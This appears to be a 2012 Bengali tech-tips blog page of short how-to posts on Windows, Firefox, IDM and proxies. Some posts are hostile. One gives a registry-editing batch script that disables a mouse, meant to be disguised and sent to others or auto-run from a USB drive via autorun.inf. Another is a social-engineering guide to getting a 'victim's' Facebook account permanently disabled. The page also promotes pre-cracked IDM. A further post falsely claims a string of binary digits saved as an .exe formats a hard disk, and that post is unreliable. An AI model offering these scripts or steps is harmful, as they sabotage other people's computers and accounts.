Put your amazing slogan here!
Here can make a detailed description of your blog so visitors will know what it is or to advertise on other sites that interest you!

Saturday, June 30, 2012

এবার IDM দিয়েই ডাউনলোড করুন Torrent ফাইল

1 comments
সাধারনত IDM দিয়ে Torrent ফাইল ডাউনলোড করা যায় না। তবে নিচে দেখানো পদ্ধতিতে কাজ করলে খুব সহজেই এখন IDM দিয়েই ডাউনলোড করতে পারবেন আপনার কাঙ্ক্ষিত Torrent ফাইল। 

প্রথমে নিচের লিঙ্ক এ ক্লিক করুন।
আপনি যে ফাইল (মুভি, ভিডিও, মিউজিক অ্যালবাম, টিভি সিরিয়াল বা যে কোন ফাইল) ডাউনলোড করতে চান তা Search বক্সে লিখে Search করুন।
বেস্ট ১০০ রেজাল্ট লিঙ্ক থেকে আপনার চাহিদা মত ফাইল এ ক্লিক করুন
যে কোন একটি লিঙ্ক এ যান।
সেখান থেকে Torrent লিঙ্ক অ্যাড্রেসটি কপি করুন
এবার নিচের লিঙ্ক এ ক্লিক যান।
কপি করা লিঙ্ক অ্যাড্রেসটি পেজ এ আসা বক্সে পেস্ট করুন এবং Go তে ক্লিক করুন 
এবার ফ্রী তে ক্লিক করুন
ফাইল টি খুব তারাতারি আপলোড হয়ে যাবে, আপলোড হয়ে গেলে [.zip] এ ক্লিক করুন যে বক্সটি আসবে সেখান থেকে start download এ ক্লিক করুন
দেখুন IDM দিয়ে ডাউনলোড হচ্ছে ফাইল টি

Read more

Friday, June 29, 2012

বাড়িয়ে নিন আপনার Firfox এবং Cometbird এর Speed

0 comments
ব্রাউজার ক্যাশিং এর কারনে একটি ওয়েব সাইট ভিজিটের সময় প্রথম বার একটি পেজ লোড হতে একটু বেশি সময় নেয়। কারন প্রথম বার কোন ওয়েব সাইটে ভিজিটের সময় ব্রাউজার কিছু ডাটা হার্ডড্রাইভে সেভ করে রাখে এবং পরবর্তীতে ভিজিটের সময় হার্ডড্রাইভ থেকে লোড করে, ফলে পেইজগুলো দ্রুত লোড হয়।RAM এর গতি হার্ডডিস্ক এর চাইতে অনেক বেশি। আর তাই ডাটা সেভ এর জন্য হার্ডড্রাইভের পরিবর্তে যদি RAM কে কাজে লাগানো যায় তাহলে ক্যাশিং এর গতি বেড়ে যাবে। এখন এই কাজটি করে ফেলুন আপনার ফায়ারফক্স ব্রাউজারে।



যেভাবে করবেনঃ
ফায়ারফক্স ব্রাউজারের এড্রেসবারে লিখুন about:config এবারএন্টার চাপুন এবং নতুন পেজ এ আসা [ I’ll be careful, I promise! ] বাটনটিতে ক্লিক করুন। এখন ফিল্টার বক্সে browser.cache লিখুন। এবার browser.cache.disk.enable এ ডাবল ক্লিক করে এর ভ্যালু false করে দিন (৪ নং লাইন এ) এবং browser.cache.memory.enable এর ভ্যালু true করে দিন (১১ নং লাইন এ)। এখন যে কোন খালি জায়গায় রাইট ক্লিক করে New > Integer এ ক্লিক করুন এবং যে বক্সটি আসবে সেখানে browser.cache.memory.capacity টাইপ করে OK চাপুন। পরে আসা বক্সটিতে 100000 লিখে OK চাপুন। এবার ফায়ারফক্স রিস্টার্ট দিন দেখুন বেড়ে গেছে আপনার ফায়ারফক্সের Speed ।
[ Cometbird এর জন্য একই নিয়ম অনুসরন করুন। ]

Read more

এক ক্লিকে রিফ্রেশ করুন আপনার পিসির সকল ড্রাইভ, কোন ড্রাইভ ফোল্ডার এ না প্রবেশ করেই

0 comments
নিচের টিপসটি Apply করে খুব সহজে কোন ড্রাইভ ফোল্ডার এ প্রবেশ না করেই এক ক্লিকে আপনার হার্ডড্রাইভ এর সব ডাটা রিফ্রেশ করতে পারবেন।
যে ভাবে করবেনঃ
প্রথমে নিচের কোড টি হুবুহু কপি করুন এবং নোটপ্যাড ওপেন করে পেস্ট করুন ।
Echo Off
cd/
tree
C:
tree
D:
tree
E:
tree
F:
tree
G:
tree
এরপর এটিকে refresh.bat নামে সেভ করুন। এবার সেভ করা ফাইলটিতে ডাবল ক্লিক করুন। দেখুন রিফ্রেশ হয়ে যাচ্ছে আপনার পিসির সকল ড্রাইভ। এখন refresh.bat ফাইলটি কপি করে ডেস্কটপ এ রেখে দিন এবং প্রয়োজন মত রিফ্রেশ করুন আপনার ড্রাইভগুলো। এখানে C, D, E, F, G এগুলো হল কম্পিউটার এর ড্রাইভ তবে আপনার কম্পিউটার এ যদি আরো ড্রাইভ থাকে তবে সেটি নোটপ্যাড এ যোগ করে নিন এভাবে-------->
H:
tree
I:
tree 
এটি উইন্ডোজ এর সকল ভার্সন এর জন্য প্রযোজ্য।

Read more

Thursday, June 28, 2012

পিসি থেকে এসএমএস পাঠান যে কোন দেশের যে কোন নাম্বার এ একদম ফ্রী

0 comments
পিসি থেকে যে কোন নাম্বার এ ফ্রী এসএমএস পাঠাতে চাইলে নিচের লিঙ্কে ক্লিক করুন এবং এসএমএস পাঠান যতো খুশি তত।



যে ভাবে করবেনঃ
From :

(e.g + country code + mobile number)
Destination :
                                                                                                                                                                     এখান থেকে যে কোন দেশের নাম সিলেক্ট করুন
Number :
 
(e.g mobile number)
Message :
 
এর পর Send বাটন ক্লিক করুন
  


Read more

Wednesday, June 27, 2012

তৈরি করুন নামবিহীন ফোল্ডার এবং Change করুন আইকন

0 comments
যে ভাবে তৈরি করবেনঃ
একটি New ফোল্ডার তৈরি করুন। এখন ফোল্ডারটির উপর রাইট বাটন চেপে Rename এ ক্লিক করুন। New folder নামটি মুছে ফেলুন। এবার কী বোর্ড থেকে Alt কী চেপে ধরে কীপ্যাড হতে 0160 চাপুন [বিঃ দ্রঃ 0160 চাপার সময় Alt কী চেপে ধরে রাখতে হবে]। এখন Alt কী ছেড়ে দিন ফলে ফোল্ডারটির নাম মুছে যাবে এবার Enter প্রেস করুন। দেখুন তৈরী হয়ে গেলো নামবিহীন একটি ফোল্ডার।
বিকল্প পদ্ধতিঃ
একটি New ফোল্ডার তৈরি করুন। এখন ফোল্ডারটির উপর রাইট বাটন চেপে Rename এ ক্লিক করুন। New folder নামটি মুছে ফেলুন। এবার কী বোর্ড থেকে Alt কী চেপে ধরে কীপ্যাড হতে 255 চাপুন [বিঃ দ্রঃ 255 চাপার সময় Alt কী চেপে ধরে রাখতে হবে]। এখন Alt কী ছেড়ে দিন ফলে ফোল্ডারটির নাম মুছে যাবে এবার Enter প্রেস করুন। দেখুন তৈরী হয়ে গেলো নামবিহীন একটি ফোল্ডার।
তবে ল্যাপটপ কম্পিউটারে এভাবে নাম ছাড়া ফোল্ডার তৈরী করা যায় না। তাই যারা ল্যাপটপ ব্যবহার করেন তারা নিচের লিঙ্ক থেকে নামবিহীন একটি ফোল্ডার [মাত্র ৬৯ বাইট] ডাউনলোড করে .rar ফোল্ডারটির উপর রাইট বাটন চেপে Extract এ ক্লিক করুন। এবারন যত খুশী কপি করে নিন।
নামবিহীন ফোল্ডার তো তৈরী হয়ে গেলো। এখন এর ওপর রাইট বাটন চেপে Properties এ ক্লিক করে Customize এ গিয়ে Change icon এ ক্লিক করে ফোল্ডারটির আইকন Change করে নিজের পছন্দমত আইকন দিন। চাইলে নিচের লিঙ্ক থেকে পছন্দমত আইকন ডাউনলোড করে নিতে পারেন।
অথবা

Read more

নিয়ে নিন IDM 6.08 build 9 Final – preactivated একদম ফ্রী

0 comments
IDM দিয়ে ডাউনলোড এর সুবিধাগুলোতো সবারই জানা কিন্তু Trial verson  ব্যবহার করে মজা পাবার পর ঝামেলায় পরতে হয় সিরিয়াল কী বা ক্র্যাক করা নিয়ে কিন্তু আজ যে IDM টা আপনাদের দিচ্ছি সেটি একদমই ফ্রী কোন সিরিয়াল কী বা ক্র্যাক এর দরকার নাই নিচের লিঙ্ক থেকে ডাউনলোড করুন
এটি IDM 6.08 build 9 এর ফুল অ্যান্ড ফাইনাল ভারসন এটি Portable তাই ইন্সটল দেবার কোন ঝামেলা নাই আপনি যদি আগে কোন IDM ব্যবহার করে থাকেন তবে এটা কম্পিউটারে রান করা আগে আগেরটা আনইন্সটল করুন এবং CCleaner দিয়ে কম্পিউটার ক্লিন করে নিন। CCleaner না থাকলে নিচের লিঙ্ক থেকে ডাউনলোড করে নিন।
Read more

অচল করে দিন কম্পিউটার এর মাউস

0 comments
Step-1
নিচের কোড গুলো কপি করে নোটপ্যাড এ পেস্ট করে সেভ করুন tku.bat নামে।
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
ফাইল টির আইকন বদলে কাউকে সেন্ড করুন সে ফাইল টিতে ক্লিক করলেই অচল হয়ে যাবে তার কম্পিউটার এর মাউস। অথবা ফাইল টি পেন ড্রাইভে সেভ করে পেন ড্রাইভ টি যখন কোন পিসিতে ঢুকাবেন তখন আর মাউস কাজ করবে না পেন ড্রাইভ খুলে নেয়ার পর ঠিক হবে তবে পেন ড্রাইভ এর মাঝে করতে হলে Step-2 এর ফাইল টাও লাগবে ।
Step-2
এবার নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন autorun.inf নামে
[autorun]
Open=tku.bat
Action=Mouse Disable
সমাধান 
নিচের কোড গুলো কপি করে নোটপ্যাড এ পেস্ট করে সেভ করুন bcapp.bat নামে।
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1
এবার এটি ক্লিক করলেই মাউস আবার সচল হয়ে যাবে ।
এটি একটি মারাত্মক জিনিস। ভুলেও নিজের পিসিতে করবেন না।
Read more

নোটপ্যাড দিয়ে সহজে ফরমেট করুন হার্ড ডিস্ক ড্রাইভ

0 comments

নিচের কোড টি হুবুহু কপি করে নোটপ্যাড ওপেন করে পেস্ট করুন। এবার এটিকে Format HDD.exe নামে সেভ করুন। এখন যদি এই exe ফাইল টি কোন কম্পিউটারে রান করানো হয় তাবে সেই কম্পিউটারের হার্ড ডিস্ক ড্রাইভ ফরমেট হয়ে যাবে।
01001011000111110010010101010101010000011111100000
তবে কারও ক্ষতি করার জন্য এটি ব্যবহার করবেন না। এবং বিনা কারনে এটি কম্পিউটারে রান করাবেন না। এর পরও কেউ ক্ষতিগ্রস্ত হলে আমি দায়ী নই।
Read more

Tuesday, June 26, 2012

আপনার উইন্ডোজের Welcome Screen এ যেকোনো ম্যাসেজ দিন সহজেই কোন সফটওয়্যার ছাড়াই

0 comments

নিম্ন লিখিত কাজ গুলো করলে যখন কম্পিউটার চালু করবেন তখন Welcome Screen এ আপনার দেয়া ম্যাসেজটি দেখাবে।
যে ভাবে করবেনঃ
Windows + R ক্লিক করে Regedit টাইপ করুন। এবার HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows NT > CurrentVersion > Winlogon এ ক্লিক করুন। ডান দিকের Legal Notice Caption এ ডাবল ক্লিক করুন। মেসেজ এর শিরনাম যা হবে তা টাইপ করুন। যেমনঃ Hello, Read me, Attention বা আপনার পছন্দমত যে কনো কিছু। এখন ডান দিক থেকে Legal Notice Text এ ডাবল ক্লিক করুন। আপনি কি মেসেজ দিতে চান তা এর মধ্যে টাইপ করুন। যেমনঃ Good day, Welcome in my world, Do not open this Computer without my permission  বা আপনার পছন্দমত যে কনো কিছু। এবার কম্পিউটার Restart করলেই Welcome Screen এ আপনার ম্যাসেজটি দেখতে পাবেন।

Read more

এখন কমেন্ট এডিট বা ডিলিট করুন ফেইসবুকে

0 comments
এখন থেকে কমেন্ট এডিট বা ডিলিট করা যাবে ফেইসবুকে। বৃহস্পতিবার থেকে কমেন্ট এডিট করার এই সার্ভিসটি চালু হয়েছে। এখন থেকে ফেইসবুকে কমেন্ট এডিট করার জন্য কমেন্টগুলোর ডান পাশে একটি ছোট পেন্সিলের মত একটি আইকন থাকবে। আইকনটিতে ক্লিক করলে ড্রপ ডাউন মেনু আসবে এবং দেখা যাবে কমেন্ট এডিট বা ডিলিট করার অপশন। এখন থেকে কোনো ছবি বা পোস্ট লাইক করলে কমেন্ট ছাড়াও সেটির এডিটিং হিস্টোরিরাদেখা যাবজাবেতাই কমেন্ট এডিট বা ডিলিট করলেও তা দেখতে পাবে ইউজাররা। অপশনটি সীমিতভাবে চালু হলেও সার্ভিসটি ফেইসবুকের সব ইউজারের অ্যাকাউন্টে ধীরে ধীরে চালু হয়ে যাবে জানিয়েছে ফেইসবুক কর্তৃপক্ষ।


Read more

এক click এ change করুন Windows 7 এর Logon Screen এর Background

0 comments
এখন খুব সহজেই change করতে পারবেন আপনার Windows 7 এর Logon Screen এর Background। এর জন্য আপনাকে খুব ছোট একটি Software ব্যবহার করতে হবে [মাত্র ২ মেগাবাইট]। এটির নাম Logon screen. নিচে দেয়া Link টি থেকে Software টি Download করে install দিন। কম্পিউটার Restart করুন।
এখন যেকোনো ছবি ওপেন না করে তার উপর মাউস রেখে রাইট বাটন চাপুন এবং set as logon background এ click করুন, এরপর yes দিন। এবার Windows + L চেপে দেখুন আপনার Logon Screen change হয়ে গেছে।

অথবা ডেস্কটপে মাউস এর রাইট বাটনে click করে দেখুন সেখানে Logon Screen নামে একটি অপশন যোগ হয়েছে। এখানে ক্লিক করে Browse করে আপনার পছন্দের ছবি সিলেক্ট করুন। এবার Windows + L চেপে দেখুন আপনার Logon Screen change হয়ে গেছে।


Read more

Computer এখন থেকে নিজেই অটো Refresh হবে

0 comments

এখন চাইলেই আপনি আপনার কম্পিউটারকে অটো রিফ্রেশ করাতে পারবেন। কাজটি করলে কম্পিউটার নিজে নিজেই রিফ্রেস করে নেবে আর কষ্ট করে মাউস দিয়ে রিফ্রেস করতে হবে না।
যে ভাবে করবেনঃ
Start Menu > Run এ গিয়ে regedit লিখে ok করুন। Registry Editor চালু হবে। HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > Update এ গিয়ে ডান পাশে লেখা দেখবেন UpdateMode, এটাতে double click করে Data 1 এর পরিবর্তে 0 করে দিন। কম্পিউটার রিস্টার্ট করুন। কাজ শেষ। এখন থেকে আপনার কম্পিউটার অটোমেটিক রিফ্রেস হবে।

Read more

Monday, June 25, 2012

জেনে নিন পিসি আচমকা পিসি রিস্টার্ট নেয়ার সম্ভাব্য কারনগুলো

0 comments
মাঝে মাঝে আচমকা পিসি রিস্টার্ট নেয়।আসুন জেনে নিই আচমকা পিসি রির্স্টাটের সম্ভাব্য কারনসমূহ-
অপারেটিং সিস্টেমের জটিলতা : অনেক সময় অপারেটিং সিস্টেমে জটিলতা দেখা দিলে বা অপারেটিং সিস্টেম ক্র্যাশ করলে পিসি রিস্টার্ট হয় ।উইন্ডোজের ডিফল্ট সিস্টেমে  অপারেটিং সিস্টেমে কোন সমস্যা হলে পিসি রিস্টার্ট নেয় ।ডিফল্ট সিস্টেম বন্ধ করতে মাই কম্পিউটারে ডান ক্লীক করে propertise থেকে Advanced tab /Startup and Recovery /Settings অপশনে যান ।এখন  System Failure অপশনের অর্ন্তগত  Automatically Restart  অপশন থেকে টিক চিহ্ণ উঠিয়ে ok  করুন।
ভাইরাসের আক্রমন : বিভিন্ন প্রকার ভাইরাসের কারনেও পিসি রিস্টার্ট নিতে পারে।এজন্য পিসিতে সবসময় হালনাগাদ (আপডেট ) এ্যন্টিভাইরাস ব্যবহার করুন ।নিয়মিত রুটিন করে পিসি স্ক্যান করুন।
হার্ডওয়্যারের সমস্যা : নতুন কোন হার্ডওয়্যার সংযুক্ত করলে এবং সেটি পিসির সাথে অসামাঞ্জস্য হলে এই সমস্যা দেখা দিতে পারে । পুরোনো হার্ডওয়্যারের সংযোগে ক্রুটি দেখা দিলে পিসি অহেতুক রিস্টার্ট নিতে পারে ।এজন্য হার্ডওয়্যারের সংযোগ স্থান চেক করে দেখুন ঠিক আছে কি না।
নতুন প্রোগ্রাম ইনস্টলে কারনে ; অনেক সময় কিছু সফটওয়্যার,গেমস ইনস্টল করার কারনে পিসি রিস্টার্ট নেয় ।আপনার পিসির কনফিগারেশনের সাথে যদি কাংখিত সফটওয়্যার,গেমন সাম্যঞ্জস্যপূর্ন না হয় তাহলে এই সমস্যা দেখা দিতে পারে।তাই বুঝে শুনে প্রোগ্রাম ইনস্টল করুন ।
হার্ডডিস্কের ক্রুটি : হার্ডডিস্কে ক্রুটিপূর্ন সমস্যা দেখা দিলে পিসি রিস্টার্ট নিতে পারে।ক্রুটির কারনে হার্ডডিস্ক ডাটা রিড করতে পারে না ।এরফলে পিসি হ্যাং অথবা রিস্টার্ট হতে পারে ।এজন্য হার্ডডিস্ক স্ক্যান করে ক্রটিপূর্ন স্থান (ব্যাড সেক্টর ) দূর করতে পারেন।
Read more

Firfox ও Comitbird এ বাংলা Front ভেঙ্গে যাওয়া সমস্যার সহজ সমাধান

0 comments
পদ্ধতিটি ব্যবহার করতে হলে অভ্র এর নতুন ভার্সন কম্পিউটারে install থাকতে হবে। যদি অভ্র install করা না থাকে তবে নিচের link থেকে download করে install করে ফেলুন।

Computer restart দিয়ে Firfox open করে নতুন একটি Tab open করুন এবং অ্যাড্রেস বারে [about:config] লিখে Enter  চাপুন।

নতুন page এ আসা [I’ll be careful, I Promise!] বাটনে click করুন।
এবার Filter বক্সে লিখুন beng
এখন beng যুক্ত কিছু সেটিংসয়ের list দেখতে পাবেন। এখান থেকে font.name-list.monospace.x-beng লেখাটি খুজে বের করে এর ওপর double click করুন। সামনে আসা input বক্সটিতে Siyam Rupali  লিখে OK দিন।
পরের ৫টি সেটিংস এ একই ভাবে Siyam Rupali  লিখে OK দিন।
ঠিকমত সেটিংস করা হলে Firfox restart দিন।
এর পর যে কোন বাংলা সাইটে গিয়ে দেখুন বাংলা Front ভেঙ্গে যাওয়া সমস্যার সমাধান হয়ে গেছে।
Comitbird এর জন্যও একই ভাবে কাজগুলো করুন।
Read more

Sunday, June 24, 2012

Disable করে দিন আপনার শত্রুর Facebook Account যা আর কখনই ফেরত পাবে না

1 comments
কাজটা করতে আপনাকে নিচের Information গুলো সংগ্রহ করতে হবে:
1.  Victim এর Facebook profile link
2.  Victim যে E-mail ID দিয়ে Login করে সেই E-mail ID
3.  Victim এর Full Date of Birth যা প্রোফাইলে ব্যাবহার করা হয়েছে
Information গুলো Collect করার পর ধাপে ধাপে নিচের কাজগুলো করুন:
1.       Victim এর Facebook profile Name এর প্রথম এবং দ্বিতীয় অংশ দিয়ে একটি Fake E-mail ID বানান [Yahoo বা Gmail]
2.       এই Link যান
3. আপনি যে Fake E-mail ID বানিয়েছিলেন তা দিন।
4. Problem Solve এর জন্যে আপনি একটা E-mail পাবেন Facebook থেকে এবং Reply দিন “I cannot access my Facebook account and even my E-mail ID associated with this account.”
এখানে Facebook উপরের 1, 2, 3  তে দেয়া Information গুলো চাইতে পারে
5. যদি এই সময়ের  মধ্য Victim তার Facebook account ওপেন না করে তাহলে Facebook থেকে আপনার কাছে সেই Fake E-mail ID তে এরকম একটি E-mail আসবে
 “Are you access associated E-mail Account or not?”
এখন আগের একই কথা লিখে Reply দিন
পরে আপনি Facebook থেকে E-mail পাবেন
“Your account has been disabled”  
একটা অনুরোধ, মজা করতে গিয়ে এটা দিয়ে কারো ক্ষতি করবেন না please
Read more

Saturday, June 23, 2012

আপনার PC তে বানান অদৃশ্য Folder

0 comments

নিচের নিয়ম অনুসরন করে কোন ধরনের Software ছাড়াই আপনার PC তে অদৄশ্য Folder বানাতে পারবেন।
প্রথমে Start Menu তে গিয়ে Character Map লিখে option open করুন। এবার Blank word টির উপর Click+Select চেপে Select করুন ও Copy করুন। এবার নতুন একটি Folder বানিয়ে Rename করে Ctrl+V চেপে পেস্ট করুন ও সেভ করুন হয়ে গেল নাম বিহীন ফোল্ডার। এবার Folder টি Right ক্লিক করে Properties > Customize Tab এ যান। এখান থেকে Blank Folder আইকনে click করে Ok দিন। আপনার অদৃশ্য ফোল্ডার তৈরী হয়ে যাবে।

Read more

Software ছাড়া নিজেই Change করুন I.P address

0 comments

I.P address হচ্ছে Internet (I) Protocol (P) এড্রেস। www এর বিভিন্ন কাজের কিছু নিয়ম রয়েছে। এসব নিয়মগুলোকে বলা হয় I.P Protocol. এসব নিয়ম মেনে ইন্টেরনেটে কম্পিউটারগুলো পরস্পরের সাথে যোগাযোগ রক্ষার জন্য এক ধরনের এড্রেস ব্যবহার করে যাকে বলা হয় I.P address.

I.P address ২ ধরনের হয়ঃ

1. Public I.P address

2. Privet I.P address

আপনার কম্পিউটার এখন কোন আই.পি এড্রেস ব্যবহার করছে তা জানতে নিচের Link এ যান------>>


কার্যপ্রণালিঃ
প্রথমে এই লিঙ্কে যান ------>>
তারপর স্ক্রিনশটের মত ক্লিক করুন IP:Port Proxies এ তারপর আমরা অনেক আইপি দেখতে পাই, কিন্তু এদের মধ্যে অনেক নিম্নমানের স্পিড সমন্বিত কানেকশন রয়েছে এবং PL ল্যাব এর কানেকশনও রয়েছে। উল্লেখ্য, PL ল্যাবের আইপি সবাই ব্যবহার করতে পারে না। সুতরাং, আমাদের এখানে আইপি ফিল্টার করে ভালো গুলো বেছে নিতে হবে। স্ক্রিনশটের মত আমরা নির্দিষ্ট পোর্টের (8080, 808, 8008, 80, 8000) আইপি খুঁজব। প্রটোকোল সব থাকবে, এনোমিটি লেভেল হাই করে রাখব, প্লানেট ল্যাব বাদ দিয়ে দিব, স্পিড ও কানেকশন ফাস্ট রাখব।


  












এরপর নিচের মত একটি তালিকা পাব






এবার আমাদের ইন্টারনেট কানেকশনের সেটিংস এ যেতে হবে।
Control Panel > Internet Options > Connections যে কানেকশনে আমরা আইপি চেঞ্জ করতে চাই, সেটিকে সিলেক্ট করে ডান পাশে সেটিংস এ ক্লিক করুন।





প্রক্সি সার্ভার থেকে Use a Proxy Server For this Connection এ টিক দিন।





এরপর hidemyass.com থেকে পাওয়া আইপি এড্রেস ও পোর্ট বসিয়ে দিন।


Read more
newer post older post Home